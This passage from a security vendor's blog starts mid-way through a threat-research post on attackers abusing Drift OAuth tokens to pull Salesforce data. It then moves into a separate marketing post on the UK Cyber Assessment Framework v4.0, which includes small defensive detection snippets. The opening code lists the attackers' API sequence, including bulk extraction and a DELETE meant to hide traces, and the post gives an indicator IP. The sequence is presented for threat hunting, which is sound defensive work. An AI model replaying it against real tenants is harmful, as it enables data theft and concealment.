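        ("GET", f"{base}/query", headers),
        # Describe endpoint: field names and data types for the Case object
        ("GET", f"{base}/sobjects/Case/describe", headers),
        # Bulk API 2.0: create a query job for large-scale extraction
        ("POST", f"{base}/jobs/query", headers),
        # Remove a job afterwards, obscuring traces of the access
        ("DELETE", f"{base}/jobs/ingest/{job_id}", headers),
    ]
```

Expressing the sequence as data in this way also makes it straightforward to compare against observed traffic when hunting for similar activity.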

A case on another US-based customer took place a day later, on August 18. This again began with an account logging in from the rare IP 208.68.36[.]90 involving the application Drift. This was followed by Salesforce GET requests targeting the same endpoints as seen in the previous case, and then a POST to the Ingest Job endpoint and finally a DELETE request, all occurring within one minute of the initial suspicious login.

The chain of anomalous behaviors, including a suspicious login and delete request, resulted in Darktrace’s Autonomous Response capability suggesting a ‘Disable user’ action. However, the customer’s deployment configuration required manual confirmation for the action to take effect.

Figure 3: An example model alert for the user, triggered due to an anomalous API DELETE request.
Figure 4: Model Alert Event Log showing various model alerts for the account that ultimately led to an Autonomous Response model being triggered.

Conclusion

This incident underscores the escalating risk of SaaS supply chain attacks, in which third-party integrations can become avenues of compromise. It demonstrates how adversaries can exploit legitimate OAuth tokens and API traffic to circumvent traditional defenses, emphasizing the necessity of constant monitoring of SaaS and cloud activity, beyond just endpoints and networks, and reinforcing the importance of applying least privilege access and routinely reviewing OAuth permissions in cloud environments. More broadly, it reflects the evolution of the threat landscape towards credential and token abuse rather than malware-driven compromise.

Appendices

Darktrace Model Detections

·      SaaS / Access / Unusual External Source for SaaS Credential Use

·      SaaS / Compromise / Login From Rare Endpoint While User Is Active

·      SaaS / Compliance / Anomalous Salesforce API Event

·      SaaS / Unusual Activity / Multiple Unusual SaaS Activities

·      Antigena / SaaS / Antigena Unusual Activity Block

·      Antigena / SaaS / Antigena Suspicious Source Activity Block

Customers should consider integrating Salesforce with Darktrace where possible. These integrations allow better visibility and correlation to spot unusual behavior and possible threats.

IoC List

(IoC – Type)

·      208.68.36[.]90 – IP Address

References

1.     https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesforce-instances-via-salesloft-drift

2.     https://trust.salesloft.com/?uid=Drift+Security+Update%3ASalesforce+Integrations+%283%3A30PM+ET%29

3.     https://thehackernews.com/2025/08/salesloft-oauth-breach-via-drift-ai.html

4.     https://unit42.paloaltonetworks.com/threat-brief-compromised-salesforce-instances/

5.     https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_query.htm

6.     https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_sobject_describe.htm

7.     https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/get_job_info.htm

8.     https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/query_create_job.htm

About the author
Emma Foulger
Global Threat Research Operations Lead

Blog / Compliance / September 8, 2025

Cyber Assessment Framework v4.0 Raises the Bar: 6 Questions every security team should ask about their security posture


What is the Cyber Assessment Framework?

The Cyber Assessment Framework (CAF) acts as a guide for UK organisations, particularly those operating essential services, critical national infrastructure and regulated sectors, for assessing, managing and improving their cybersecurity, cyber resilience and cyber risk profile.

The guidance in the Cyber Assessment Framework aligns with regulations such as The Network and Information Systems Regulations (NIS), The Network and Information Security Directive (NIS2) and the Cyber Security and Resilience Bill.

What’s new with the Cyber Assessment Framework 4.0?

On 6 August 2025, the UK’s National Cyber Security Centre (NCSC) released Cyber Assessment Framework 4.0 (CAF v4.0), a pivotal update that reflects the increasingly complex threat landscape and the regulatory need for organisations to respond in smarter, more adaptive ways.

The Cyber Assessment Framework v4.0 introduces significant shifts in expectations, including, but not limited to:

  • Understanding threats in terms of the capabilities, methods and techniques of threat actors and the importance of maintaining a proactive security posture (A2.b)
  • The use of secure software development principles and practices (A4.b)
  • Ensuring threat intelligence is understood and utilised - with a focus on anomaly-based detection (C1.f)
  • Performance of proactive threat hunting with automation where appropriate (C2.a)

This blog post will focus on these components of the framework. However, we encourage readers to get the full scope of the framework by visiting the NCSC website, where the full framework is available.

In summary, the changes to the framework send a clear signal: the UK’s technical authority now expects organisations to move beyond static rule-based systems and embrace more dynamic, automated defences. For those responsible for securing critical national infrastructure and essential services, these updates are not simply technical preferences, but operational mandates.

At Darktrace, this evolution comes as no surprise. In fact, it reflects the approach we've championed since our inception.

Why Darktrace? Leading the way since 2013

Darktrace was built on the principle that detecting cyber threats in real time requires more than signatures, thresholds, or retrospective analysis. Instead, we pioneered a self-learning approach powered by artificial intelligence, that understands the unique “normal” for every environment and uses this baseline to spot subtle deviations indicative of emerging threats.

From the beginning, Darktrace has understood that rules and lists will never keep pace with adversaries. That’s why we’ve spent over a decade developing AI that doesn't just alert, it learns, reasons, explains, and acts.

With Cyber Assessment Framework v4.0, the bar has been raised to meet this new reality. For technical practitioners tasked with evaluating their organisation’s readiness, there are six essential questions that should guide the selection or validation of anomaly detection capabilities.

6 Questions you should ask about your security posture to align with CAF v4

1. Can your tools detect threats by identifying anomalies?

Cyber Assessment Framework v4.0 principle C1.f has been added in this version and requires that, “Threats to the operation of network and information systems, and corresponding user and system behaviour, are sufficiently understood. These are used to detect cyber security incidents.”

This marks a significant shift from traditional signature-based approaches, which rely on known Indicators of Compromise (IOCs) or predefined rules to an expectation that normal user and system behaviour is understood to an extent enabling abnormality detection.

Why this shift?

An overemphasis on threat intelligence alone leaves defenders exposed to novel threats or new variations of existing threats. By including reference to “understanding user and system behaviour” the framework is broadening the methods of threat detection beyond the use of threat intelligence and historical attack data.

CAF v4.0 places emphasis on understanding normal user and system behaviour and using that understanding to detect abnormalities and, as a result, adverse activity. There is a further expectation that threats are understood in terms of industry-specific issues and that monitoring is continually updated.

Darktrace uses an anomaly-based approach to threat detection, which involves establishing a dynamic baseline of “normal” for your environment and then flagging deviations from that baseline, even when there are no known IoCs to match against. This allows security teams to surface previously unseen tactics, techniques, and procedures in real time, whether it’s:

  • An unexpected outbound connection pattern (e.g., DNS tunnelling);
  • A first-time API call between critical services;
  • Unusual calls between services; or  
  • Sensitive data moving outside normal channels or timeframes.

The requirement that organisations must be equipped to monitor their environment, create an understanding of normal and detect anomalous behaviour aligns closely with Darktrace’s capabilities.
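As a deliberately simplified illustration of the baseline-and-deviation idea (a toy z-score test, not Darktrace's actual modelling), consider flagging an account whose hourly API request count departs sharply from its learned history:

```python
from statistics import mean, stdev

def is_anomalous(history, observed, threshold=3.0):
    """Flag an observation that deviates from the learned baseline by
    more than `threshold` standard deviations (a simple z-score test)."""
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:
        return observed != mu
    return abs(observed - mu) / sigma > threshold

# Hourly Salesforce API request counts for one account (illustrative)
baseline = [12, 9, 15, 11, 14, 10, 13, 12, 11, 14]
print(is_anomalous(baseline, 13))    # within normal range -> False
print(is_anomalous(baseline, 480))   # burst of bulk queries -> True
```

A real deployment learns many such features per user and device and updates the baseline continuously; the point of the sketch is only that detection is driven by deviation from learned behaviour rather than by a signature match.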

2. Is threat hunting structured, repeatable, and improving over time?

CAF v4.0 introduces a new focus on structured threat hunting to detect adverse activity that may evade standard security controls, or for cases where such controls cannot be deployed.

Principle C2.a outlines the need for documented, repeatable threat hunting processes and stresses the importance of recording and reviewing hunts to improve future effectiveness. This inclusion acknowledges that reactive threat hunting is not sufficient. Instead, the framework calls for:

  • Pre-determined and documented methods to ensure threat hunts can be deployed at the requisite frequency;
  • Threat hunts to be converted into automated detection and alerting, where appropriate;
  • Maintenance of threat hunt records and post-hunt analysis to drive improvements in the process and overall security posture;
  • Regular review of the threat hunting process to align with updated risks;
  • Leveraging automation for improvement, where appropriate;
  • Focus on threat tactics, techniques and procedures, rather than one-off indicators of compromise.

Traditionally, playbook creation has been a manual process — static, slow to amend, and limited by human foresight. Even automated SOAR playbooks tend to be stock templates that can’t cover the full spectrum of threats or reflect the specific context of your organisation.

CAF v4.0 sets the expectation that organisations should maintain documented, structured approaches to incident response. But Darktrace / Incident Readiness & Recovery goes further. Its AI-generated playbooks are bespoke to your environment and updated dynamically in real time as incidents unfold. This continuous refresh of “New Events” means responders always have the latest view of what’s happening, along with an updated understanding of the AI's interpretation based on real-time contextual awareness, and recommended next steps tailored to the current stage of the attack.

The result is far beyond checkbox compliance: a living, adaptive response capability that reduces investigation time, speeds containment, and ensures actions are always proportionate to the evolving threat.

3. Do you have a proactive security posture?

Cyber Assessment Framework v4.0 does not just want organisations to detect threats; it expects them to anticipate and reduce cyber risk before an incident ever occurs. That is why principle A2.b calls for a security posture that moves from reactive detection to predictive, preventative action.

A proactive security posture focuses on reducing the ease of the most likely attack paths in advance and reducing the number of opportunities an adversary has to succeed in an attack.

To meet this requirement, organisations could benefit from looking for solutions that can:

  • Continuously map the assets and users most critical to operations;
  • Identify vulnerabilities and misconfigurations in real time;
  • Model likely adversary behaviours and attack paths using frameworks like MITRE ATT&CK; and  
  • Prioritise remediation actions that will have the highest impact on reducing overall risk.

When done well, this approach creates a real-time picture of your security posture, one that reflects the dynamic nature of your internal environment and the ongoing evolution of the external threat landscape. This enables security teams to focus their time on activities such as validating resilience through red teaming exercises or forecasting.

4. Can your team/tools customize detection rules and enable autonomous responses?

CAF v4.0 places greater emphasis on reducing false positives and acting decisively when genuine threats are detected.  

The framework highlights the need for customisable detection rules and, where appropriate, autonomous response actions that can contain threats before they escalate:

The following new requirements are included:  

  • C1.c: Alerts and detection rules should be adjustable to reduce false positives and optimise responses. Custom tooling and rules are used in conjunction with off-the-shelf tooling and rules;
  • C1.d: You investigate and triage alerts from all security tools and take action, allowing for improvement and prioritisation of activities;
  • C1.e: Monitoring and detection personnel have sufficient understanding of operational context and deal with workload effectively, as well as identifying areas for improvement (alert or triage fatigue is not present);
  • C2.a: Threat hunts should be turned into automated detections and alerting where appropriate, and automation should be leveraged to improve threat hunting.
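As a hypothetical sketch of codifying a hunt into a repeatable automated check, consider the pattern from the Salesforce case earlier in this post: an API DELETE issued from a source IP never previously seen for that account. The event schema, field names, and IP addresses below are invented for illustration:

```python
def hunt_rare_source_deletes(events, known_ips):
    """Flag API DELETE requests from IPs not previously seen for the account.

    events: iterable of dicts with 'user', 'method', and 'src_ip' keys.
    known_ips: mapping of user -> set of previously observed source IPs.
    """
    alerts = []
    for e in events:
        if e["method"] == "DELETE" and e["src_ip"] not in known_ips.get(e["user"], set()):
            alerts.append(e)  # candidate for alerting or automated response
    return alerts

# Illustrative data only
events = [
    {"user": "alice", "method": "GET", "src_ip": "10.0.0.5"},
    {"user": "alice", "method": "DELETE", "src_ip": "198.51.100.7"},
]
known = {"alice": {"10.0.0.5"}}
print(hunt_rare_source_deletes(events, known))  # only the DELETE from the new IP
```

Once a hunt like this is written down as code, it can be scheduled, version-controlled, and reviewed after each run, which is exactly the kind of documented, repeatable process principle C2.a describes.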

Tailored detection rules improve accuracy, while automation accelerates response, both of which help satisfy regulatory expectations. Cyber AI Analyst provides AI-driven investigation of alerts and can dramatically reduce the time a security team spends on them, cutting alert fatigue and freeing time for strategic initiatives and for identifying improvements.

5. Is your software secure and supported?  

CAF v4.0 introduced a new principle which requires software suppliers to leverage an established secure software development framework. Software suppliers must be able to demonstrate:  

  • A thorough understanding of the composition and provenance of software provided;  
  • That the software development lifecycle is informed by a detailed and up to date understanding of threat; and  
  • They can attest to the authenticity and integrity of the software, including updates and patches.  

Darktrace is committed to secure software development and all Darktrace products and internally developed systems are developed with secure engineering principles and security by design methodologies in place. Darktrace commits to the inclusion of security requirements at all stages of the software development lifecycle. Darktrace is ISO 27001, ISO 27018 and ISO 42001 Certified – demonstrating an ongoing commitment to information security, data privacy and artificial intelligence management and compliance, throughout the organisation.  

6. Is your incident response plan built on a true understanding of your environment and does it adapt to changes over time?

CAF v4.0 raises the bar for incident response by making it clear that a plan is only as strong as the context behind it. Your response plan must be shaped by a detailed, up-to-date understanding of your organisation’s specific network, systems, and operational priorities.

The framework’s updates emphasise that:

  • Plans must explicitly cover the network and information systems that underpin your essential functions because every environment has different dependencies, choke points, and critical assets.
  • They must be readily accessible even when IT systems are disrupted, ensuring critical steps and contact paths aren’t lost during an incident.
  • They should be reviewed regularly to keep pace with evolving risks, infrastructure changes, and lessons learned from testing.

From government expectation to strategic advantage

Cyber Assessment Framework v4.0 signals a powerful shift in cybersecurity best practice. The newest version sets a higher standard for detection performance, risk management, threat hunting, software development and proactive security posture.

For Darktrace, this is validation of the approach we have taken since the beginning: to go beyond rules and signatures to deliver proactive cyber resilience in real-time.

-----

Disclaimer:

This document has been prepared on behalf of Darktrace Holdings Limited. It is provided for information purposes only to provide prospective readers with general information about the Cyber Assessment Framework (CAF) in a cyber security context. It does not constitute legal, regulatory, financial or any other kind of professional advice and it has not been prepared with the reader and/or its specific organisation’s requirements in mind. Darktrace offers no warranties, guarantees, undertakings or other assurances (whether express or implied)  that: (i) this document or its content are  accurate or complete; (ii) the steps outlined herein will guarantee compliance with CAF; (iii) any purchase of Darktrace’s products or services will guarantee compliance with CAF; (iv) the steps outlined herein are appropriate for all customers. Neither the reader nor any third party is entitled to rely on the contents of this document when making/taking any decisions or actions to achieve compliance with CAF. To the fullest extent permitted by applicable law or regulation, Darktrace has no liability for any actions or decisions taken or not taken by the reader to implement any suggestions contained herein, or for any third party products, links or materials referenced. Nothing in this document negates the responsibility of the reader to seek independent legal or other advice should it wish to rely on any of the statements, suggestions, or content set out herein.  

The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content without notice.

About the author
Mariana Pereira
VP, Field CISO